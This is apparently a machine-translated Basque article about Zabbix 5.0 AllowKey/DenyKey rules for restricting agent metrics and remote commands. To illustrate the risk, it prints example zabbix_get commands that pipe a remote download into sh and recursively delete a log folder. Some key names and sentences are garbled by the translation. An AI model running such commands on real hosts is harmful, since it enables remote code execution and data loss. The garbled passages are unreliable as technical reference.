Zabbix 5.0-n agenteen alboko metriketarako zerrenda beltza eta zuri-zerrendarako laguntza

Zerrenda beltzak eta zerrenda zuriak onartzen ditu agenteen alboko neurketetarako

Tikhon Uskov, Integrazio Ingeniaria, Zabbix

Datuen segurtasun arazoak

Zabbix 5.0-k funtzio berri bat du, Zabbix Agent erabiliz sistemetan segurtasuna hobetzeko eta parametro zaharra ordezkatzen duena. EnableRemoteCommands.

Agenteetan oinarritutako sistemen segurtasunaren hobekuntzak agente batek arriskutsuak izan daitezkeen ekintza ugari egin ditzaketetik datoz.

• Agenteak ia edozein informazio bil dezake, informazio konfidentziala edo arriskutsua izan daitekeena barne, konfigurazio-fitxategietatik, erregistro-fitxategietatik, pasahitz-fitxategietatik edo beste edozein fitxategitik.

Esate baterako, zabbix_get utilitatea erabiliz erabiltzaileen zerrendara sar zaitezke, haien etxeko direktorioetara, pasahitz fitxategietara, etab.

Datuak atzitzea zabbix_get utilitatea erabiliz

OHARRA. Datuak soilik berreskura daitezke agenteak dagokion fitxategian irakurtzeko baimenak baditu. Baina, adibidez, fitxategia /etc/passwd/ erabiltzaile guztiek irakurtzeko modukoa.

• Agenteak arriskutsuak izan daitezkeen komandoak ere exekutatu ditzake. Adibidez, tekla *sistema.exekutatu[]** sareko nodoetan urruneko komandoak exekutatzeko aukera ematen du, Zabbix web-interfazeko scriptak exekutatzen dituztenak barne, agentearen aldetik komandoak ere exekutatzen dituztenak.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Linux-en, agentea lehenespenez exekutatzen da root pribilegiorik gabe, Windows-en, berriz, zerbitzu gisa exekutatzen da Sistema gisa eta fitxategi-sistemarako sarbidea du mugarik gabe. Horren arabera, instalazioaren ondoren Zabbix Agent parametroetan aldaketarik egiten ez bada, agenteak erregistrora, fitxategi-sistemarako sarbidea du eta WMI kontsultak exekutatu ditzake.

Aurreko bertsioetan parametroa EnableRemoteCommands=0 * gakoarekin neurketak desgaitzea onartzen dasistema.exekutatu[]** eta web-interfazetik exekutatzen diren script-ak, baina ez zegoen modurik fitxategi indibidualetara sarbidea mugatzeko, agentearekin instalatutako gako indibidualak baimendu edo desgaitzeko edo parametro indibidualen erabilera mugatzeko.

EnableRemoteCommand parametroa erabiliz Zabbix-en aurreko bertsioetan

AllowKey/DenyKey

Zabbix 5.0-k baimenik gabeko sarbide hori babesten laguntzen du, zerrenda zuriak eta zerrenda beltzak eskainiz, agenteen aldetik neurketak baimendu eta ukatzeko.

Zabbix 5.0-n tekla guztiak, * barnesistema.exekutatu[]** gaituta daude, eta bi agente konfiguratzeko aukera berri gehitu dira:

AllowKey= — baimendutako egiaztapenak;

DenyKey= — debekatutako txekeak;

non metakaraktere (*) erabiltzen dituen parametroak dituen gako-izen eredua da.

AllowKey eta DenyKey teklei esker, eredu zehatz batean oinarritutako neurri indibidualak baimendu edo ukatu ditzakezu. Beste konfigurazio-parametroak ez bezala, AllowKey/DenyKey parametroen kopurua ez da mugatua. Horri esker, argi eta garbi defini dezakezu agenteak sisteman zer egin dezakeen egiaztapenen zuhaitza sortuz: gako exekutagarriak, non idazteko ordenak oso garrantzitsua den.

Arauen sekuentzia

Arauak konfigurazio fitxategian sartzen diren ordenan egiaztatzen dira. Gakoa lehen partidaren aurretik arauen arabera egiaztatzen da, eta datu-elementuaren gakoa ereduarekin bat datorren bezain laster, onartzen edo ukatzen da. Horren ondoren, arauen egiaztapena gelditzen da eta gainerako gakoak ez dira aintzat hartzen.

Hori dela eta, elementu bat baimendu eta ukatu arau batekin bat badator, emaitza konfigurazio-fitxategiko lehen arauaren araberakoa izango da.

2 arau ezberdin eredu berdinarekin eta giltza batekin vfs.file.size[/tmp/file]

AllowKey/DenyKey teklak erabiltzeko ordena:

1. arau zehatzak,
2. arau orokorrak,
3. arau debekua.

Adibidez, karpeta jakin bateko fitxategietarako sarbidea behar baduzu, lehenik eta behin haietarako sarbidea baimendu behar duzu, eta, ondoren, ezarritako baimenen barruan sartzen ez den guztia ukatu. Lehenik ukatzeko araua erabiltzen bada, karpetarako sarbidea ukatuko da.

Sekuentzia zuzena

2 utilitate exekutatzen utzi behar badituzu * bidezsistema.exekutatu[]**, eta ukatzeko araua zehaztuko da lehenik, utilitateak ez dira abiaraziko, lehen eredua beti bat etorriko baita edozein gako, eta ondorengo arauei ez zaie jaramonik egingo.

Sekuentzia okerra

Ereduak

Oinarrizko arauak

Eredua komodinak dituen adierazpena da. Metakaraktereak (*) bat egiten du edozein karaktere kopuru zehatz batean. Metakaraktereak gakoaren izenan zein parametroetan erabil daitezke. Adibidez, lehen parametroa testuarekin zorrozki defini dezakezu, eta zehaztu ondorengoa komodin gisa.

Parametroak kortxete artean [] sartu behar dira.

• system.run[* - oker
• vfs.file*.txt] - oker
• vfs.file.*[*] - zuzen

Komodinaren erabileraren adibideak.

1. Gakoaren izenan eta parametroan. Kasu honetan, gakoa ez dagokio parametrorik ez duen antzeko gako bati, ereduan gakoaren izenaren amaiera jakin bat eta parametro multzo jakin bat jaso nahi ditugula adierazi baitugu ereduan.
2. Ereduak ez baditu kortxete erabiltzen, ereduak parametrorik ez duten gako guztiak onartzen ditu eta zehaztutako parametroa duten gako guztiak ukatzen ditu.
3. Gakoa osorik idatzita badago eta parametroak komodin gisa zehazten badira, antzeko edozein gako bat egingo du parametroekin eta ez da bat egingo kortxeterik gabeko gakoarekin, hau da, baimendu edo ukatu egingo da.

Parametroak betetzeko arauak.

• Parametroak dituen gako bat erabili nahi bada, parametroak konfigurazio fitxategian zehaztu behar dira. Parametroak metakaraktere gisa zehaztu behar dira. Beharrezkoa da edozein fitxategitarako sarbidea arretaz ukatzea eta kontuan hartu zer informazio eman dezakeen metrikak ortografia ezberdinetan - parametroekin eta gabe.

Parametroak dituzten teklak idazteko ezaugarriak

• Gako bat parametroekin zehazten bada, baina parametroak aukerakoak badira eta metakaraktere gisa zehaztuta, parametrorik gabeko gako bat ebatziko da. Adibidez, PUZaren kargari buruzko informazioa jasotzea desgaitu eta system.cpu.load[*] gakoa desgaitu behar dela zehaztu nahi baduzu, ez ahaztu parametrorik gabeko gakoak batez besteko karga-balioa itzuliko duela.

Parametroak betetzeko arauak

Oharrak

doikuntza

• Arau batzuk ezin ditu erabiltzaileak aldatu, adibidez, aurkikuntza-arauak edo agenteak automatikoki erregistratzeko arauak. AllowKey/DenyKey arauek ez diete eraginik parametro hauetan:
  - HostnameItem
  - HostMetadataItem
  - HostInterfaceItem

OHARRA. Administratzaile batek gako bat desgaitzen badu, galdetzean, Zabbix-ek ez du informaziorik ematen metrika edo gakoa zergatik dagoen ' kategorianEZ ONARTZEN'. Urruneko komandoak exekutatzeko debekuei buruzko informazioa ere ez da bistaratzen agentearen erregistro-fitxategietan. Hau segurtasun arrazoiengatik da, baina arazketa zaildu dezake neurketak onartzen ez diren kategoria batean sartzen badira arrazoiren batengatik.

• Kanpoko konfigurazio-fitxategiak konektatzeko ez duzu inolako ordena zehatz batean fidatu behar (adibidez, ordena alfabetikoan).

Komando-lerroko utilitateak

Arauak ezarri ondoren, dena behar bezala konfiguratuta dagoela ziurtatu behar duzu.

Hiru aukera hauetako bat erabil dezakezu:

• Gehitu metrika bat Zabbix-i.
• Testuarekin zabbix_agentd. Zabbix agente aukerarekin -inprimatu (-p) gako guztiak erakusten ditu (lehenespenez onartzen direnak) konfigurazioak onartzen ez dituenak izan ezik. Eta aukerarekin -proba (-t) debekatutako giltza bat itzuliko baita'Onartzen ez den elementuaren gakoa'.
• Testuarekin zabbix_get. Erabilgarritasuna zabbix_get aukerarekin -k itzuliko da'ZBX_NOTSUPPORTED: metrika ezezaguna'.

Baimendu edo ukatu

Fitxategi baterako sarbidea ukatu eta egiazta dezakezu, adibidez, utilitatea erabiliz zabbix_getfitxategirako sarbidea ukatzen zaiola.

**

OHARRA. Parametroko komatxoak ez dira aintzat hartzen.

Kasu honetan, fitxategi honetara sarbidea beste bide batetik baimendu daiteke. Adibidez, esteka sinboliko batek bertara eramaten badu.

Zehaztutako arauak aplikatzeko hainbat aukera egiaztatzea gomendatzen da, eta debekuak saihesteko aukerak ere kontuan hartzea.

Galderak eta erantzunak

Galdera. Zergatik aukeratu zen hain eredu konplexua bere hizkuntzarekin arauak, baimenak eta debekuak deskribatzeko? Zergatik ezin izan zen erabili, adibidez, Zabbixek erabiltzen dituen esamolde erregularrak?

Erantzun. Hau regex errendimendu arazoa da normalean agente bakarra dagoelako eta metrika kopuru handi bat egiaztatzen duelako. Regex eragiketa astuna da eta ezin ditugu modu honetan milaka neurketa egiaztatu. Komodinak - irtenbide unibertsala, oso erabilia eta sinplea.

Galdera. Ez al daude sartu fitxategiak ordena alfabetikoan?

Erantzun. Dakidanez, ia ezinezkoa da arauak zein ordenatan aplikatuko diren aurreikustea arauak fitxategi ezberdinetan zabaltzen badituzu. AllowKey/DenyKey arau guztiak Include fitxategi batean biltzea gomendatzen dut, elkarrekin elkarreragiten dutelako eta fitxategi hau barne..

Galdera. Zabbix 5.0-n aukera 'EnableRemoteCommands=' konfigurazio fitxategian falta da, eta AllowKey/DenyKey bakarrik daude erabilgarri?

Erantzun. Bai horixe.

Eskerrik asko zure arreta!

Iturria: www.habr.com